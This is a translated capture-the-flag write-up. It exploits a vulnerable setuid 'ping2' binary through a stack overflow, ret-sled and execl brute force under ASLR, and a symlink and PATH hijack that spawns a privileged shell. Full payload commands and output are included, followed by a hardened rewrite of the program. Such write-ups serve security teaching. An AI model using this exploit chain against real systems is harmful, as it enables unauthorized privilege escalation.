Write-up by Hyuk of WG.
[Source] http://hkkiw0823.pe.kr/xe/index.php?mid=Security&document_srl=854
http://www.hackerschool.org/Sub_Html/HS_University/CTF/Codegate/2011/vuln300/vuln300.html
Mong-hyung's Codegate problem-solving lecture
================================ Source: 포너.tistory ======================================
hust problem K write-up
After connecting to the contest server there is a file called ping2.
To see what ping2 does, I looked at its source.
dr-xr-xr-x. 2 whatthe whatthe 4096 2011-10-03 09:41 .
drwxr-xr-x. 5 root root 4096 2011-10-01 08:40 ..
lrwxrwxrwx. 1 root root 9 2011-10-03 09:41 .bash_history -> /dev/null
-rw-r--r--. 1 whatthe whatthe 18 2010-06-23 00:15 .bash_logout
-rw-r--r--. 1 whatthe whatthe 176 2010-06-23 00:15 .bash_profile
-rw-r--r--. 1 whatthe whatthe 124 2010-06-23 00:15 .bashrc
-r-sr-xr-x. 1 gotroot gotroot 4907 2011-10-01 08:31 ping2
-rw-r--r--. 1 root root 268 2011-10-01 08:31 ping2.c
[whatthe@k1rha ~]$ cat ping2.c
#include<stdio.h>
#include<string.h>
#include<stdlib.h>
extern char **environ;
int main(int argc,char* argv[]){
    char buff[100];                 /* 100-byte stack buffer */
    if(argc<2){
        printf("Usage : ./[file] [argv]\n");
    }
    else{
        strcpy(buff,argv[1]);       /* unbounded copy: argv[1] longer than buff overwrites the stack */
        printf("%s\n",buff);
        system("ls");               /* setuid binary resolves "ls" through the caller's PATH */
    }
}
Looking at the source, this is a classic buffer overflow problem.
The contest environment is Fedora Core 14.
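As an added example (my own code, not from the write-up or the contest), this is what a hardened ping2 would look like: the argument is copied with a bound check that rejects anything that does not fit in buff, and the directory listing is run through execve with an absolute path and a fixed environment after the setuid privilege is dropped, so neither the return address nor PATH is under the caller's control. The function names copy_arg and run_ls_safely are mine.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Bounded replacement for strcpy(buff, argv[1]): copies only if src and its NUL
 * fit in dst (returns 0), otherwise returns -1 without touching the stack. */
int copy_arg(char *dst, size_t dstsz, const char *src) {
    const char *end = memchr(src, '\0', dstsz);
    if (end == NULL)
        return -1;                  /* no terminator within dstsz: would overflow */
    memcpy(dst, src, (size_t)(end - src) + 1);
    return 0;
}

/* Replacement for system("ls"): drop the setuid euid to the real uid, then run
 * /bin/ls by absolute path with a fixed environment, so the caller's PATH (the
 * symlink trick in the write-up) is never consulted. Returns ls's exit status. */
int run_ls_safely(const char *dir) {
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        if (setuid(getuid()) != 0)  /* give up the elevated privileges first */
            _exit(127);
        char *const argv[] = { (char *)"ls", (char *)dir, NULL };
        char *const envp[] = { (char *)"PATH=/usr/bin:/bin", NULL };
        execve("/bin/ls", argv, envp);
        _exit(127);                 /* execve only returns on failure */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(int argc, char *argv[]) {
    char buff[100];
    if (argc < 2) {
        printf("Usage : ./[file] [argv]\n");
        return 1;
    }
    if (copy_arg(buff, sizeof buff, argv[1]) != 0) {
        fprintf(stderr, "argument too long (max %zu bytes)\n", sizeof buff - 1);
        return 1;
    }
    printf("%s\n", buff);
    return run_ls_safely(".");
}
```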
[whatthe@k1rha ~]$ uname -a
Linux k1rha 2.6.35.14-96.fc14.i686 #1 SMP Thu Sep 1 12:49:38 UTC 2011 i686 i686 i386 GNU/Linux
[whatthe@k1rha ~]$ cat /proc/self/maps
005c4000-00747000 r-xp 00000000 fd:00 1049216 /lib/libc-2.13.so
00747000-00748000 ---p 00183000 fd:00 1049216 /lib/libc-2.13.so
00748000-0074a000 r--p 00183000 fd:00 1049216 /lib/libc-2.13.so
0074a000-0074b000 rw-p 00185000 fd:00 1049216 /lib/libc-2.13.so
[whatthe@k1rha ~]$ cat /proc/self/maps
00d79000-00efc000 r-xp 00000000 fd:00 1049216 /lib/libc-2.13.so
00efc000-00efd000 ---p 00183000 fd:00 1049216 /lib/libc-2.13.so
00efd000-00eff000 r--p 00183000 fd:00 1049216 /lib/libc-2.13.so
00eff000-00f00000 rw-p 00185000 fd:00 1049216 /lib/libc-2.13.so
Library addresses are randomized and ASCII armor is in place as well -_-;
To see whether any hope remained, I checked whether the addresses are fully random.
[whatthe@k1rha ~]$ gdb -q ping
Reading symbols from /bin/ping...(no debugging symbols found)...done.
Missing separate debuginfos, use: debuginfo-install iputils-20100418-3.fc14.i686
(gdb) b main
Breakpoint 1 at 0x8048427
(gdb) r
Starting program: /home/whatthe/ping2
Breakpoint 1, 0x08048427 in main ()
Missing separate debuginfos, use: debuginfo-install glibc-2.13-2.i686
(gdb) p execl
$1 = {<text variable, no debug info>} 0x1ac670 <execl>
(gdb) p execl
Examining it repeatedly with gdb, the address 0x1ac670 comes back about once every 6 to 8 runs.
[whatthe@k1rha ~]$ strace ./ping2 `python -c 'print "a"*112+"\x37\x85\x04\x08"*22+"\x70\xc6\x1a"'`
execve("./ping2", ["./ping2", "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"...], [/* 27 vars */]) = 0
brk(0) = 0x817f000
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb782f000
.... (omitted) ...
--- {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=11715, si_status=0, si_utime=0, si_stime=0} (Child exited) ---
execve("1\355^\211\341\203\344\360PTRh\340\204\4\10h\200\204\4\10QVh$\204\4\10\350\243\377\377\377\364\220\220\220\220\220\220\220\220\220\220\220\220\220\220U\211\345S\215d$\374\200=\4\227\4\10", [], [/* 27 vars */]) = -1 ENOENT (No such file or directory)
--- {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x2} (Segmentation fault) ---
+++ killed by SIGSEGV +++
세그멘테이션 오류 (the shell's Korean-locale "Segmentation fault" message, mis-encoded on the original page)
[whatthe@k1rha ~]$
Using a ret sled to shift the argument to a location holding a fixed value and then calling execl,
you can see that execve is reached about once every 6 to 8 runs.
"1\355^\211\341\203\344\360PTRh\340\204\4\10h\200\204\4\10QVh$\204\4\10\350\243\377\377\377\364\220\220\220\220\220\220\220\220\220\220\220\220\220\220U\211\345S\215d$\374\200=\4\227\4\10"
I created a symbolic link named after this fixed value so that it gets executed and resets the privileges.
[whatthe@k1rha ~]$ cd /tmp
[whatthe@k1rha tmp]$ mkdir hkkiw0823 ; cd hkkiw0823/
[whatthe@k1rha hkkiw0823]$ cat > ex.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main(void){
    setreuid(geteuid(),geteuid());     /* make the real uid match the inherited effective uid */
    execl("/bin/sh","sh",(char *)0);
    return 0;
}
[whatthe@k1rha hkkiw0823]$ gcc -o ex ex.
[whatthe@k1rha hkkiw0823]$ ln -s ex `python -c 'print "1\355^\211\341\203\344\360PTRh\340\204\4\10h\200\204\4\10QVh$\204\4\10\350\243\377\377\377\364\220\220\220\220\220\220\220\220\220\220\220\220\220\220U\211\345S\215d$\374\200=\4\227\4\10"'`
[whatthe@k1rha hkkiw0823]$ export PATH=./:$PATH
[whatthe@k1rha hkkiw0823]$ ls
1?^?????PTRh????h????QVh$????????????????????U??S?d$??=???? ex
Running it about 6 or 7 times yields a shell.
[whatthe@k1rha hkkiw0823]$ /home/whatthe/ping2 `python -c 'print "a"*112+"\x37\x85\x04\x08"*22+"\x70\xc6\x1a"'`
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?p?
1?^?????PTRh????h????QVh$????????????????????U??S?d$??=???? ex
세그멘테이션 오류
[whatthe@k1rha hkkiw0823]$ /home/whatthe/ping2 `python -c 'print "a"*112+"\x37\x85\x04\x08"*22+"\x70\xc6\x1a"'`
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?p?
1?^?????PTRh????h????QVh$????????????????????U??S?d$??=???? ex
세그멘테이션 오류
[whatthe@k1rha hkkiw0823]$ /home/whatthe/ping2 `python -c 'print "a"*112+"\x37\x85\x04\x08"*22+"\x70\xc6\x1a"'`
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?p?
1?^?????PTRh????h????QVh$????????????????????U??S?d$??=???? ex
세그멘테이션 오류
[whatthe@k1rha hkkiw0823]$ /home/whatthe/ping2 `python -c 'print "a"*112+"\x37\x85\x04\x08"*22+"\x70\xc6\x1a"'`
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?p?
1?^?????PTRh????h????QVh$????????????????????U??S?d$??=???? ex
세그멘테이션 오류
[whatthe@k1rha hkkiw0823]$ /home/whatthe/ping2 `python -c 'print "a"*112+"\x37\x85\x04\x08"*22+"\x70\xc6\x1a"'`
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?p?
1?^?????PTRh????h????QVh$????????????????????U??S?d$??=???? ex
sh-4.1$
sh-4.1$
sh-4.1$ id
uid=503(gotroot) gid=502(whatthe) groups=503(gotroot),502(whatthe) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
sh-4.1$ /bin/bash
[gotroot@k1rha hkkiw0823]$ cd /home
[gotroot@k1rha home]$ ls
gotroot point whatthe
[gotroot@k1rha home]$ cd gotroot/
[gotroot@k1rha gotroot]$ ls
keyvalueresult
[gotroot@k1rha gotroot]$ cat keyvalueresult
wantedGirlfriend
Key : wantedGirlfriend